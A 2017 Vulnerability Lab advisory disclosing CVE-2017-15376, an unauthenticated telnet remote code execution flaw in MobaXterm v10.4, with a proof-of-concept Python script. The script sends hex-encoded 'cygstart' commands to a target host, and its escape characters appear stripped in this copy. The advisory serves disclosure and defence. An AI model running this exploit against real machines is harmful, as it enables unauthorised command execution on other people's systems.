Document Title: =============== MobaXtrem v10.4 - Remote Code Execution Vulnerability Date: ===== 2017-09-17 References: =========== https://www.vulnerability-lab.com/get_content.php?id=2097 Video: https://www.youtube.com/watch?v=FtBGmwFtRrE http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15376 CVE-ID: ===== CVE-2017-15376 VL-ID: ===== 2097 Common Vulnerability Scoring System: ==================================== 6.5 Vulnerability Class: ==================== Code Execution Introduction: ============= We have been creating system and network software since 2008 for worldwide users. Mobatek develops high value products in order to provide efficient and cost effective solutions for your IT, development and DBA teams. Our products are designed to ensure high security, efficiency and focused on user experience. No headache for deployment: our products do not require any dependency, Internet connection or third-party software to run. (Copy of the Homepage: http://www.mobatek.net/ ) (Source: http://download.mobatek.net/10420170816103227/MobaXterm_Portable_v10.4.zip ) Abstract: ========= An independent vulnerability laboratory researcher discovered a remote code execution vulnerability in the official MobaXtrem v10.4 software. Report-Timeline: ================ 2017-09-18: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Mobatek Product: MobaXtrem - Software v10.4 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A remote code execution vulnerability has been discovered in the official MobaXtrem v10.4 software. The vulnerability allows remote attackers to unauthorized execute malicious codes to compromise the targeted computer system. Telnet service doesn't authenticate for a remote conncection which allows attacker to pass malicious commands over victims computer system through the basic protocol. Proof of Concept: ================= The vulnerability can be exploited by local and remote attackers without user interaction or privileged user accounts. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. import telnetlib,sys print """ Exploit => MobaXtrem 10.4 Remote Code Execution Discoverer => Sultan Albalawi """ def get_set(HOST,cmd): try : tn = telnetlib.Telnet(HOST) bg="x63x79x67x73x74x61x72x74" tn.write(bg+" ./"+cmd+"n") tn.write(main()) tn.read_all() except KeyboardInterrupt: print "[-] Execution stopped ... keyboard interrupt raised" except Exception as e: pass def main(): if len(sys.argv)==2: HOST = sys.argv[1] cmd = str(raw_input("cmd> ")) if "exit" in cmd : sys.exit("exiting...") else: print"Executing => %s"%cmd get_set(HOST,cmd) else: print "Usage: ./"+sys.argv[0]+" " if __name__ == '__main__': main() Risk: ===== The security risk of the remote code execution vulnerability in the software is estimated as high (CVSS). Credits: ======== Sultan Albalawi [pentestt270@gmail.com] - https://www.vulnerability-lab.com/show.php?user=Sultan+Albalawi Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™